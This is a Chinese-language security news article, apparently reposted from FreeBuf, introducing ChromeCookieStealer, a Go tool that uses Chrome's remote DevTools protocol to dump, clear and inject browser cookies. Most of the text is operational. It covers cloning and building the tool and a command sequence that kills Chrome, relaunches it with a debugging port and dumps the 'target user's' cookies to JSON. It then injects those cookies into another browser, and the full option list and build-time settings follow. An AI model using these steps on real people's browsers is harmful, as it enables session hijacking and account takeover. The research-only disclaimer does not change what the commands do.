如何使用ChromeCookieStealer通过开发者工具收集和注入Chrome Cookie
2023-12-8 19:8:42 Author: FreeBuf(查看原文) 阅读量:6 收藏

关于ChromeCookieStealer 

ChromeCookieStealer是一款功能强大的Cookie数据收集和注入工具,该工具需要配合Chrome使用,能够利用Chrome的远程DevTools(开发者工具)协议实现浏览器Cookie的数据收集、注入、清理和删除操作。
该工具支持使用Chrome自己的格式并以JSON对象形式转储Cookie数据,Cookie数据的加载和注入同样使用的是这类数据格式。该工具仅供安全研究和测试使用,请勿将其用于其他目的。

 功能介绍 

1、转储Chrome浏览器的Cookie数据;
2、将转储的Cookie数据注入到其他Chrome实例中;
3、清理Chrome的Cookie数据;
4、编译过程中支持自定义设置;

 工具下载 

由于该工具基于Go语言开发,因此我们首先需要在本地设备上安装并配置好Go语言环境。
接下来,广大研究人员可以使用下列命令将该项目源码克隆至本地:
git clone https://github.com/magisterquis/chromecookiestealer.git
(向右滑动,查看更多)
然后切换到项目目录中,使用go build命令构建项目源码:
cd chromecookiestealergo build

 工具快速使用 

构建完成后,执行下列命令即可收集目标用户Chrome浏览器中的Cookie数据:
pkill Chrome/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --restore-last-session # 需要根据目标情况修改./chromecookiestealer -dump ./cookies.json
(向右滑动,查看更多
下列命令可以将转储的Cookie数据注入到研究人员的本地浏览器中:
# 使用一个调试端口启动Chrome,具体可参考上面的命令
./chromecookiestealer -clear -inject ./cookies.json

(向右滑动,查看更多)

 工具帮助信息 

Usage: chromecookiestealer [options]
Attaches to Chrome using the Remote DevTools Protocol (--remote-debugging-port)
and, in order and as requested:
- Dumps cookies
- Clears cookies
- Injects cookies
- Deletes selected cookies
Parameters for cookies to be deleted should be represented as an array of JSON
objects with the following string fields
name - 要删除的Cookie名称
url - 删除跟指定域名或URL匹配的所有Cookie
domain - 仅删除指定域名的Cookie
path - 仅删除指定路径的Cookie
Filenames may also be "-" for stdin/stdout.
Options:
-chrome URL
Chrome远程调试URL (默认为"ws://127.0.0.1:9222")
-clear
清理浏览器Cookie
-delete file
包含要删除Cookie参数的文件名称
-dump file
转储Cookie的文件名称
-inject file
需要注入的包含Cookie的文件名称
-no-summary
退出时不打印概述信息
-verbose
启用Verbose日志

(向右滑动,查看更多)

 其他编译选项 

一般情况下,go build命令足够满足绝大部分用户的需求。如果你需要执行更有针对性的安全测试,可以在编译过程中使用“-ldflags '-X main.Foo=bar'”选项实现自定义配置。
变量
描述
DumpFile
转储Cookie的文件名称,在-dump中设置
InjectFile
需要注入的文件名称,在-inject中设置
DeleteFile
描述需要删除Cookie的文件名称,在-delete中设置
DoClear
是否需要清理Cookie,在-clear中设置
需要注意的是,上述所有的选项/变量默认都是未设置的。

 许可证协议 

本项目的开发与发布遵循BSD-3-Clause开源许可证协议。

 项目地址 

ChromeCookieStealerhttps://github.com/magisterquis/chromecookiestealer
FreeBuf粉丝交流群招新啦!
在这里,拓宽网安边界
甲方安全建设干货;
乙方最新技术理念;
全球最新的网络安全资讯;
群内不定期开启各种抽奖活动;
FreeBuf盲盒、大象公仔......
扫码添加小蜜蜂微信回复“加群”,申请加入群聊
https://github.com/slyd0g/WhiteChocolateMacademiaNut
https://chromedevtools.github.io/devtools-protocol/tot/Network/#type-Cookie

文章来源: http://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651250488&idx=4&sn=705cfdbe5e748f66075c6308e1336133&chksm=bd1d4db38a6ac4a51968ec578bd7b2d145d34681b3fae263441e67500eb4e25f0f3db436d46f&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh